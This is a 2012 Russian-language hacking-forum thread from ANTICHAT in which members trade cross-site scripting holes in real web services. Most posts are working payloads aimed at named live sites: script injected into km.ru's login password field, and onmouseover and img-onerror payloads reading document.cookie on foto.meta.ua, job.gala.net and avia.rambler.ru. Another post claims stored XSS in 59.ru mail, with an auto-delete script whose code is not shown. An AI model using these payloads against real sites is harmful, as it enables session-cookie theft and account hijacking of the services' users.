HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 31.03.2012, 12:48
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от eclipse  
eclipse said:
Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (
ссылка
)
Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл
 
Ответить с цитированием

  #232  
Старый 31.03.2012, 13:32
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:
Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл
Цитата:
Сообщение от None  
function ajaxComment(){ //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
Действительно, херня какая-то ))))

Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:

Код:
Code:
function ajaxComment(){  //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
                var author = document.getElementsByName('author')[1].value;
                var message = document.getElementsByName('comment')[0].value;
                var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
                $.ajax({
			type: "POST",
                        url: document.location.href,
                        data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
			success: function() {
				$('#comment').hide().append(''+author+' написал'+message+'').show('slow');
				}
			});
	return false;
						
}
И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос

А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))
 
Ответить с цитированием

  #233  
Старый 31.03.2012, 13:57
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от eclipse  
eclipse said:
Вывод: Java Script инъекция есть
Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?

Цитата:
Сообщение от eclipse  
eclipse said:
если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос
Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
 
Ответить с цитированием

  #234  
Старый 31.03.2012, 14:14
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Цитата:
Сообщение от None  
Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.
Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

Насчет практики, нет, не юзабельно (удаленно)

Хотя, теоретически))

Можно:

1.отправить человека на свой php скрипт

2.скрипт выводит iframe с античатом

3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент

4.инжект выполнится))

Ну в общем это из раздела фантастики))))
 
Ответить с цитированием

  #235  
Старый 31.03.2012, 15:21
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от eclipse  
eclipse said:
2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена
 
Ответить с цитированием

  #236  
Старый 31.03.2012, 15:52
Га-Ноцри
Guest
Сообщений: n/a
Провел на форуме:
103014

Репутация: 76
По умолчанию

km.ru

После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

Post:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]user_login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]support[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]user_domain[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]freemail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]user_password[/COLOR][COLOR="#007700"]=%[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3Cscript[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3Ealert[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]28[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27Hello[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2C[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]world[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3B[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3C[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2Fscript[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]3E[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]op[/COLOR][COLOR="#007700"]=%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]92[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]BE[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]B9[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D1[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]82[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]D0[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]B8[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]form_build_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]form[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]a080de13ffb21494853525a2e1c6cf72[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]form_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_imap_mail_extra_login_form[/COLOR][/COLOR
Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)
 
Ответить с цитированием

  #237  
Старый 08.04.2012, 19:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 6
По умолчанию

Активная xss в теле письма на 59.ru

Активная xss в теле письма на http://59.ru/

Почта

Xss код

Код HTML:
HTML:
Далее я сделал бонус,автоудаление письма

Код автоудаление письма

Код HTML:
HTML:
Я бы этот код запихал в JS фаил и вызвал через xss.

Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

PS создайте тему с активными xss в теле письма пжл.
 
Ответить с цитированием

  #238  
Старый 14.04.2012, 15:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 6
По умолчанию

Активная xss на foto.meta.ua

Активка тут http://foto.meta.ua/4552903.image

Уязвимый код тэги

" onmouseover='alert(document.cookie)'

Выполняется принаведении на тэги.
 
Ответить с цитированием

  #239  
Старый 26.04.2012, 21:23
Марок
Guest
Сообщений: n/a
Провел на форуме:
10959

Репутация: 0
По умолчанию

job.gala.net

http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email=">alert(' xz che za')
 
Ответить с цитированием

  #240  
Старый 15.07.2012, 12:42
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E

http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(d ocument.cookie)%3E
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ